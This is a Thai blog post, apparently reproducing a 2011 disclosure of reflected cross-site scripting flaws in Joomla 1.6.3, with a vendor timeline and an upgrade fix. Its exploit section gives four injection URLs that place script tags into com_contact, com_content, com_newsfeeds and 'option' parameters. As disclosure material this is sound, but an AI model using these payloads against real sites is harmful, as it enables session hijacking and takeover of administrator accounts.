Joomla คือ CMS ฟรีตัวหนึ่งที่เป็นที่นิยม Joomla เขียนด้วย PHP โดยใช้เทคนิค OOP(object-oriented programming) และ software design patterns โดยเก็บข้อมูลด้วย Mysql ซึ่งมี features ต่างๆเช่น RSS feeds,
printable versions of pages, news flashes, blogs, polls, search และยังสนับสนุนภาษาต่างๆมากมายรวมทั้งภาษาไทยด้วย
VULNERABILITY DESCRIPTION
พารามิเตอร์หลายๆตัว เช่น QueryString, option, searchword ในคอมโพเนนซ์หลัก เช่น com_content, com_contact, com_newsfeeds, com_search ซึ่งใช้งานผ่าน URL /index.php ซึ่งจะยอมให้ Attacker โจมตีด้วย Cross Site Scriptingได้ ซึ่งอาจจะยอมให้มีการรัน script ที่ิ brower ของเครื่องเป้าหมายได้
เวอร์ชั่นที่มีผล คือ 1.6.3 หรือต่ำกว่า
EXPLOIT
component: com_contact , parameter: QueryString (Browser: All)
===============================================================
http://attacker.in/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1"><script>alert(/XSS/)</script>
component:com_content , parameter: QueryString (Browser: All)
===============================================================
http://attacker.in/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=><script>alert(/XSS/)</script>
component: com_newsfeeds , parameter: QueryString (Browser: All)
=================================================================
http://attacker.in/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere="><script>alert(/XSS/)</script>&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering
parameter: option (Browser: All)
====================================
http://attacker.in/joomla163_noseo/index.php?option="><script>alert(/XSS/)</script>&task=reset.request
ผลกระทบ คือ ผู้โจมตีสามารถเข้าใช้สิทธิเป็น administrator ได้ ซึ่งจะทำอะไรได้ทั้งหมดเทียบเท่า administrator
แก้ไขได้โดยอัพเกรดเป็นเวอร์ชั่น 1.6.4
ผู้ค้นพบ
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
2011-05-26: notified vendor
2011-06-28: vendor released fix
2011-06-28: vulnerability disclosed
ไม่มีความคิดเห็น:
แสดงความคิดเห็น